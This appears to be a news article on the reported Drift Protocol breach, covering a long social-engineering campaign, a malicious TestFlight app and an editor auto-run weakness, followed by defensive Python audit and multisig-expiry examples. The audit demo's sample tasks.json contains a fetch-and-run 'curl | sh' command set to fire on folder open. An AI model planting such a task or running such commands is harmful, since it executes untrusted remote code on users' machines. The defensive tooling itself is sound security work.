A sophisticated intelligence campaign spanning six months reportedly led to the $270 million breach of Drift Protocol, with investigators linking the operation to a North Korean state-backed threat group. The details were revealed in an incident update shared by the protocol’s team on Sunday.
According to the report, the attackers initiated contact in fall 2025 during a prominent cryptocurrency conference. They posed as representatives of a quantitative trading firm interested in integrating with Drift. The group demonstrated strong technical expertise, credible professional histories, and a deep understanding of the platform’s functionality. Communication soon moved to a Telegram group, where discussions over trading strategies and vault integrations continued for months—mirroring typical onboarding processes for DeFi trading firms.
Between December 2025 and January 2026, the group successfully onboarded an Ecosystem Vault, participated in multiple collaborative sessions, invested more than $1 million of their own funds, and established a seemingly legitimate operational role within the ecosystem.
Drift contributors also met members of the group in person at several major global industry events through February and March. By the time the exploit occurred on April 1, the relationship had developed over nearly half a year.
Investigators believe the breach stemmed from two primary attack vectors.
One of these was a malicious iOS app delivered through TestFlight, Apple's channel for distributing pre-release builds to testers, which undergoes a lighter beta review than a full App Store submission. The attackers presented this app as their wallet solution. Installing a TestFlight build means running vendor-supplied native code on the contributor's device, so a counterparty's "beta wallet" should be treated as untrusted software, not as a vetted App Store product.
The second vector exploited a known weakness in VS Code and in Cursor, a VS Code-based editor. Security researchers had flagged the issue since late 2025: merely opening an attacker-supplied file or folder could trigger silent execution of code, with no prompt or warning to the user. For a contributor, that turns a project shared over a chat channel from a document into an execution vector.
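One practical check before opening anything a counterparty sends is to audit the workspace files an editor acts on. The script below is an added example, not Drift's tooling and not a reproduction of the specific issue in the article; it assumes one well-documented mechanism, namely that VS Code (and VS Code-based editors such as Cursor) will honour `.vscode/tasks.json` entries with `"runOptions": {"runOn": "folderOpen"}` and start that command when a trusted folder is opened. The sample repository it scans is constructed inline.

```python
"""Pre-open audit for editor workspace files that can run code on folder open.

Added example (not Drift's code, not a reproduction of the reported bug).
Assumption: .vscode/tasks.json tasks with runOptions.runOn == "folderOpen"
are started automatically when the folder is opened in VS Code-style editors.
Run find_autorun_tasks() over a fresh clone before opening it in an editor.
"""
from __future__ import annotations

import json
import os
import re
import tempfile
from pathlib import Path

# Matches a JSON string literal, a // line comment, or a /* */ block comment.
# Strings are matched first so a "//" inside a URL string is not treated as a comment.
_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)


def strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: drop comments, keep strings, then drop trailing commas."""
    no_comments = _TOKEN.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)
    return re.sub(r",(\s*[}\]])", r"\1", no_comments)


def find_autorun_tasks(repo: str) -> list[dict]:
    """Return every task under repo/**/.vscode/tasks.json that runs on folderOpen.

    Files that cannot be parsed are reported too: an unreadable tasks.json
    is something to inspect by hand, not to ignore.
    """
    findings = []
    for path in Path(repo).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            doc = json.loads(strip_jsonc(path.read_text(encoding="utf-8")))
        except (json.JSONDecodeError, UnicodeDecodeError) as exc:
            findings.append({"file": str(path.relative_to(repo)), "label": None,
                             "command": None, "error": str(exc)})
            continue
        for task in doc.get("tasks", []):
            run_on = (task.get("runOptions") or {}).get("runOn")
            if run_on == "folderOpen":
                findings.append({"file": str(path.relative_to(repo)),
                                 "label": task.get("label"),
                                 "command": task.get("command"),
                                 "error": None})
    return findings


def demo() -> list[dict]:
    """Build a constructed sample repo with one benign and one auto-run task, then scan it."""
    tasks = '''{
      // constructed sample: comments and trailing commas are legal in tasks.json
      "version": "2.0.0",
      "tasks": [
        {"label": "build", "type": "shell", "command": "make"},
        {
          "label": "setup",
          "type": "shell",
          "command": "curl -fsSL http://example.invalid/x.sh | sh",
          "runOptions": {"runOn": "folderOpen"},
        },
      ]
    }'''
    repo = tempfile.mkdtemp(prefix="audit-")
    os.makedirs(os.path.join(repo, ".vscode"))
    Path(repo, ".vscode", "tasks.json").write_text(tasks, encoding="utf-8")
    return find_autorun_tasks(repo)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

This catches only the documented auto-run path; it does not cover whatever bypass the article's researchers reported, so it complements rather than replaces opening unknown projects in a disposable VM or with workspace trust left off.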
With access to contributor devices, the attackers obtained the required approvals (signatures) on a multisig transaction; the signing threshold was satisfied with the legitimate signers' keys rather than bypassed. The pre-approved transaction then sat dormant for more than a week before it was executed on April 1, draining $270 million from Drift's vaults in less than a minute.
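The week-long gap between approval and execution is the part of this sequence a defender can act on. The model below is an added example, not Drift's code and not any real multisig contract: it gives collected approvals an expiry, so a transaction can only execute while every counted approval is recent, and it surfaces queued transactions that keep lingering. The threshold, the validity window, the signer names and the timestamps are all constructed assumptions.

```python
"""Approval-freshness policy for a multisig signing queue.

Added example; hypothetical control, not Drift's code or a real contract.
Models the failure mode in the article: approvals gathered from signers
whose devices are compromised, then held for days before execution.
Timestamps are UNIX seconds; all data below is constructed.
"""
from __future__ import annotations

from dataclasses import dataclass, field

HOUR = 3600
DAY = 24 * HOUR


@dataclass
class Approval:
    signer: str
    at: int  # UNIX seconds when the signer approved


@dataclass
class QueuedTx:
    tx_id: str
    to: str
    amount: int
    created_at: int
    approvals: list[Approval] = field(default_factory=list)


@dataclass
class Policy:
    threshold: int
    max_age: int = 3 * DAY       # an approval older than this no longer counts (assumed window)
    stale_after: int = 2 * DAY   # a queue entry older than this is flagged for review (assumed)


def fresh_approvals(tx: QueuedTx, now: int, policy: Policy) -> list[Approval]:
    """Approvals still inside the validity window, one per signer (latest wins)."""
    latest: dict[str, Approval] = {}
    for a in tx.approvals:
        if a.signer not in latest or a.at > latest[a.signer].at:
            latest[a.signer] = a
    return [a for a in latest.values() if now - a.at <= policy.max_age]


def can_execute(tx: QueuedTx, now: int, policy: Policy) -> tuple[bool, str]:
    """Execute only if the threshold is met by approvals that have not expired."""
    fresh = fresh_approvals(tx, now, policy)
    if len(fresh) >= policy.threshold:
        return True, f"{len(fresh)}/{policy.threshold} fresh approvals"
    expired = {a.signer for a in tx.approvals} - {a.signer for a in fresh}
    return False, f"only {len(fresh)}/{policy.threshold} fresh; expired: {sorted(expired)}"


def stale_queue(queue: list[QueuedTx], now: int, policy: Policy) -> list[str]:
    """IDs of transactions that have lingered past stale_after; someone should ask why."""
    return [tx.tx_id for tx in queue if now - tx.created_at > policy.stale_after]


def demo() -> tuple[tuple[bool, str], tuple[bool, str], list[str]]:
    """Replay the timeline: approvals on day 0, execution attempted on day 8."""
    policy = Policy(threshold=3)
    t0 = 1_700_000_000
    tx = QueuedTx("tx-1", to="0xconstructed", amount=270_000_000, created_at=t0)
    # day 0: three signers approve from devices that, unknown to them, are compromised
    for signer in ("alice", "bob", "carol"):
        tx.approvals.append(Approval(signer, t0 + HOUR))
    same_day = can_execute(tx, t0 + 2 * HOUR, policy)      # would pass
    eight_days = can_execute(tx, t0 + 8 * DAY, policy)     # approvals expired, rejected
    flagged = stale_queue([tx], t0 + 8 * DAY, policy)      # entry surfaced days earlier
    return same_day, eight_days, flagged


if __name__ == "__main__":
    for result in demo():
        print(result)
```

Expiry does not stop a signer whose device is under attacker control; it forces the attacker to re-engage every signer close to execution time, which shortens the dormancy window and produces a fresh, auditable re-approval event. Where the multisig itself never expires collected signatures, this check has to live in the signing front end or in a pre-execution guard.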
The attack has been attributed to UNC4736, a group associated with North Korea and also known as AppleJeus or Citrine Sleet. This conclusion is based on blockchain transaction trails linked to previous Radiant Capital attacks, as well as similarities in operational tactics tied to known DPRK-linked actors.
Notably, the individuals who attended the conferences and met contributors in person were not North Korean nationals. Experts note that such groups routinely work through intermediaries with carefully constructed identities, complete with credible employment records and professional networks designed to withstand scrutiny.
In response, Drift has advised other DeFi protocols to reassess their security frameworks, particularly access controls. The team emphasized that any device involved in multisig governance should be treated as a potential point of compromise.
The incident raises broader concerns for the industry. Multisig schemes are widely relied upon as a core security control, but this case shows their limit: a signature threshold raises the number of keys an attacker must control, yet when the signers' own devices are compromised the threshold is met with legitimate keys and the scheme sees nothing anomalous. If attackers are prepared to invest months, significant capital, and in-person meetings to build trust within a platform, the question is whether existing security models can detect a threat embedded this deeply.